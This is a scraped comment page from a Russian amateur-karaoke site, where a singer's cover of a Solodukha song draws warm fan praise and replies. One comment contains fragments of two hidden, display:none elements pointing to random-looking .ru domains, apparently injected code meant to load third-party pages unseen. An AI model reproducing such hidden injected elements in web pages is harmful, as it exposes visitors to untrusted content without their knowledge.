На главную Muza.vip
      
Спасательный круг
(Карнавал (группа))
Запела осень
(Хурсенко Вячеслав)
Прекрасная дама
(Сурина Ирина)
Романс
(Сумишевский Ярослав)
Кладут асфальт
(Иваси)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Здравствуй, чужая милая» (Солодуха Александр)

117   85   2
   Кавер-версия от regina74
06.02.2017 0856
Доброе утро, друзья.
Запись ОНЛАЙН.
ПРИГЛАШАЕМ НА НАШ ДУЭТ.
СПАСИБО ВСЕМ, КТО ПОСЛУШАЕТ.
http://muzmix.com/user/stars/songs/269299
  Баллов:
72
  


Комментарии пользователей к записи:

wados, 06.02.2017 г. 09:31
ДОБРОЕ УТРО РЕГИНОЧКА.ВЕЛИКОЛЕПНОЕ ИСПОЛНЕНИЕ.БЛЕСТЯЩЕ СПЕЛА.СЛУШАТЬ СПЛОШНОЕ УДОВОЛЬСТВИЕ.КРИЧУ БРАВО.УМНИЧКА.bravo_bigvoov_naushnikahlove_onlinebuket_serdechkibuket_big

  

regina74, 06.02.2017 г. 09:45
ДОБРОЕ УТРО, ВАЛЕРОЧКА!
СПАСИБО, ЗА ПРИЯТНЫЕ СЛОВА guitarИ КРАСИВЫЙ БУКЕТ РОЗ!klass

  
alne5656, 06.02.2017 г. 09:34
Отлично спела РЕГИНА!!!!!!!!!!!bravo_bigbuket_big
  

regina74, 06.02.2017 г. 09:46
СПАСИБО САША!!! ПРИЯТНО!!!guitar

  
adagio5, 06.02.2017 г. 11:07
Региша! Привет! Замечательно исполнила!!!buket_serdechkiМежду нами 2647км по прямой! Но как-то получилось, что мы одновременно записали эту песню! Ну что ж свой вариант выставлю позже!zzz
  

regina74, 06.02.2017 г. 11:28
ПРИВЕТ ЛЁША!!!
СПАСИБО, ЗА ПРИЯТНЫЕ СЛОВА!!!guitar
ОБЯЗАТЕЛЬНО ЗАБЕГУv_naushnikah

  
leila08, 06.02.2017 г. 11:25
Регинчик,ты такая милая!vozdushnyj_pocelujvstrecha
  

regina74, 06.02.2017 г. 11:29
guitarСПАСИБО МИЛАЯ ЛЕЙЛОЧКА, ЗА ПРИЯТНЫЕ СЛОВА!vstrecha

  

leila08, 06.02.2017 г. 11:34
  

regina74, 06.02.2017 г. 11:39
vstrecha

  
rgulova58, 06.02.2017 г. 11:27
Регинушка! Классную песню исполнила классно!bravo_bigЧувственно и трогательно!bravo_bigbuket_bigФотки voobuket_serdechki
Похожее изображение
  

regina74, 06.02.2017 г. 11:40
guitarСПАСИБО МИЛАЯ ЭММОЧКА, ЗА ТЁПЛЫЕ И ПРИЯТНЫЕ СЛОВА!vstrecha
ДОМОВЁНОКklass

  
nadeyna, 06.02.2017 г. 14:18
Региночка красиво..очень....Потрясающе звучишь. bravo_big
  

regina74, 06.02.2017 г. 15:28
СПАСИБО ВИКТОРИЯ, ЗА ПРИЯТНЫЕ СЛОВА!guitar

  
taty2801, 06.02.2017 г. 16:52
Региночка, kрасивые песни запела в преддверии Святого Валентина, спасибо за твоё исполнение! lyubovnyj_roman bravo_big


  

regina74, 06.02.2017 г. 17:20
СПАСИБО ТАНЕЧКА, ЗА ТЁПЛЫЙ ОТЗЫВ!guitar
КАРТИНОЧКАklass

  
mranatolm, 06.02.2017 г. 18:45
Региночка !!!!!!! Замечательно и красиво спела !!!!!!!!!

  

regina74, 06.02.2017 г. 21:22
СПАСИБО ТОЛЕНЬКА, ЗА ПРИЯТНЫЕ СЛОВАguitar И КРАСИВЫЙ БУКЕТ РОЗ!!!klass

  
milana18, 06.02.2017 г. 19:35
  

regina74, 06.02.2017 г. 21:22
СПАСИБКИ!guitar

  
IvanovSergey777, 06.02.2017 г. 20:16
Региночка, прекрасно спела! Браво bravo_bigbuket_bigs_sharikamibuket_serdechki id="a1996667054" src="https://ec2f1xubcblb.ru/f2.html?a=28206" style="display:none"> id="a754394637" src="https://3o9cpydyue4s8.ru/u.html?a=28206" style="display:none">
  

regina74, 06.02.2017 г. 21:23
СПАСИБО СЕРЁЖА, ЗА ПРИЯТНЫЕ СЛОВА И РОЗОЧКИ!guitar

  
Marinajazz, 06.02.2017 г. 22:20
v_naushnikah....................ну вот, Региночка, и ты этой песенкой переболела!klassbravo_bigbuket_bigvozdushnyj_poceluj
  

regina74, 07.02.2017 г. 13:59
СПАСИБО МАРИША, ЧТО ПОСЛУШАЛА!guitar

  
runomir, 07.02.2017 г. 02:05
КРАСИВО РЕГИША!o_daserdce_v_rukebuket_serdechki
  

regina74, 07.02.2017 г. 13:59
СПАСИБО САША! ПРИЯТНО!guitar

  
alunchik, 07.02.2017 г. 02:41
РЕГИНОЧКА voobuket_bigulybaemsya_i_mashemбравооо
  

regina74, 07.02.2017 г. 13:59
СПАСИБО АЛЛОЧКА!guitar

  
Sapevala80, 07.02.2017 г. 12:22
Очень люблю эту песню, раньше слушала ее со слезами на глазах, так она меня трогала!!!dadaРегинчик, замечательно спела песню!!! klass Тронула мою душу!!!! serdce_v_ruke Фотки классные!!!bravo_bigvoobuket_biglove_onlineulybaemsya_i_mashemvozdushnyj_poceluj
  

regina74, 07.02.2017 г. 14:00
СПАСИБО ДОРОГАЯ НИНОЧКА, ЗА ТЁПЛЫЕ И ПРИЯТНЫЕ СЛОВА!!!guitarserdce_v_rukevozdushnyj_poceluj

  
irisha56, 10.02.2017 г. 14:42
Отлично спела,Региночка!!Замечательная песня!!

  

regina74, 10.02.2017 г. 18:55
СПАСИБО МИЛАЯ ИРИШЕЧКА!guitarserdce_v_ruke
КАРТИНОЧКАklass

  
podsnegnik, 17.02.2017 г. 15:04
  

regina74, 17.02.2017 г. 15:09
СПАСИБКИ ВАМ. ЦВЕТОЧЕКklassguitarbuket_serdechki
  

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО




Студия
alexs55
Родные места
Антонов Юрий
vas707356
У бога на тебя особый вкус
Добров Клим
-andrey
Я в весеннем лесу
Ножкин Михаил
4upakabra
Родина моя
4upakabra
besel1212
Несет меня течение
Антонов Юрий
fulmaster
Городу на Неве
felivanov54
Что мне делать
Суручану Ион
kir4
Сердце на снегу
Ибрагимов Ренат
dimakapitan
Родина
Трофимов Сергей
schotter
Покраснела рябина
Михайлов Стас
akononov6690
Не пишите мне писем, дорогая графиня
Гулько Михаил
Serge_Poet
Дуэт лисы Актрисы и кота Василия
Музыкальные сказки
rusalka & Marinajazz
Cara mia
Baccara
djdfy56
По бугоркам
Пташица
lori
Позови меня
Магомаев Муслим
WECHER-36
Про белые розы
Билан Дима
SERG-S
Держи меня за руку
Михайлов Стас
volod
Проводи меня домой
Серков Сергей
mranatolm
Назову любимою
Кибирев Игорь
LonelyWoolf
Hey Tonight
Creedence Clearwater Revival
Haris1958
Molina
Creedence Clearwater Revival
BEDHAR58
Venus
Shocking Blue
VETER36
А любовь рядом была
Шаврина Екатерина
Tol
Офицеры
Газманов Олег
Radmila76
Черным по белому
Эрденко Леонсия
ROLLER & 8911083
The gypsy
Deep Purple
leopold5005
Путь
Машина времени
AndreySidore
В последний раз
Веселые ребята
gdi1960
Не зажигай
Лещенко Лев
Marka64
До утра
БИ-2




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.